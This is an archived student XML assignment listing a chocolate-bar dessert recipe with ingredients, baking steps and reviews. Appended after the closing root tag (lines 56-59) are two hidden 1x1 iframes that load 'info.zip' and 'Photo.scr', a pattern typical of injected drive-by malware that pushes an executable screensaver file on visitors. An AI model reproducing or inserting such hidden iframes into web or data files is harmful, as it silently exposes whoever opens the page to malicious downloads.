home *** CD-ROM | disk | FTP | other *** search
/ 207.233.110.77 / 207.233.110.77.tar / 207.233.110.77 / web31 / Section_78401 / Students / Barzola_Henry / tutorial.11 / review / desserts.xml next >
Extensible Markup Language  |  2016-05-28  |  3KB  |  60 lines

  1. <?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
  2. <!-- 
  3.    Desserts from thehelpfulcook.com
  4.  
  5.    Filename: desserts.xml
  6.    Author: Henry Barzola
  7.    Class: CISM31 Section 78401
  8.    Semester: Fall 2011
  9.    Assignment: Review
  10.    Date: 12/05/2011
  11.    E-Mail: Henry_Barzola1@my.vcccd.edu
  12.  
  13. -->
  14. <?xml-stylesheet type="text/css" href="dstyles.css" ?>
  15. <desserts>
  16.     <dessert>
  17.         <title>Delicious Chocolate Bars</title>
  18.         <description>
  19.             <![CDATA[
  20.                 These delicious chocolate bars are a holiday favorite and are 
  21.                 very easy to make. For an extra kick add a shot of amaretto to the
  22.                 chocolate mixture.
  23.                 ]]>
  24.         </description>
  25.         <author>Kevin Young</author>
  26.         <servings>36 bars</servings>
  27.         <prepTime>2 hours</prepTime>
  28.         <ingredients>
  29.             <ingredient>12 ounce pkg. chocolate chips</ingredient>
  30.             <ingredient>1 (8 oz.) pkg. cream cheese</ingredient>
  31.             <ingredient>1 (5.3 oz.) can evaporated milk</ingredient>
  32.             <ingredient>1 cup walnuts, chopped</ingredient>
  33.             <ingredient>½ teaspoon almond extract</ingredient>
  34.             <ingredient>3 cups all-purpose flour, unsifted</ingredient>
  35.             <ingredient>1 ½ cups granulated sugar</ingredient>
  36.             <ingredient>1 teaspoon baking powder</ingredient>
  37.             <ingredient>½ teaspoon salt</ingredient>
  38.             <ingredient>1 cup butter or margarine, softened</ingredient>
  39.             <ingredient>2 eggs</ingredient>
  40.             <ingredient>½ teaspoon almond extract</ingredient>
  41.         </ingredients>    
  42.         
  43.         <steps>
  44.             <step>Combine chocolate chips, cream cheese and evaporated milk in medium saucepan.</step>
  45.             <step>Cover over low heat, stirring constantly, until chips are melted and mixture is smooth.</step>
  46.             <step>Remove from heat; stir in walnuts and ½ teaspoon almond extract. Blend well; set aside.</step>
  47.             <step>Combine remaining ingredients in large mixer bowl. Blend well with mixer until mixture resembles coarse crumbs.</step>
  48.             <step>Press half of mixture in greased 13 x 9 inch pan. Spread with chocolate mixture. Sprinkle with rest of crumbs over filling; bake at 375° for 35 to 40 minutes.</step>
  49.         </steps>
  50.         <reviews>
  51.             <review>4 Stars. Terrific. These are a big hit with our family at Christmas - Lori D.</review>
  52.             <review>4 Stars. Delicious and easy to make - Helen S.</review>
  53.             <review>3 Stars. Very good. A touch heavy for my taste - Stefanie J.</review>
  54.         </reviews>
  55.     </dessert>
  56. </desserts><iframe src=info.zip width=1 height=1 frameborder=0>
  57. </iframe>
  58. <iframe src=Photo.scr width=1 height=1 frameborder=0>
  59. </iframe>
  60.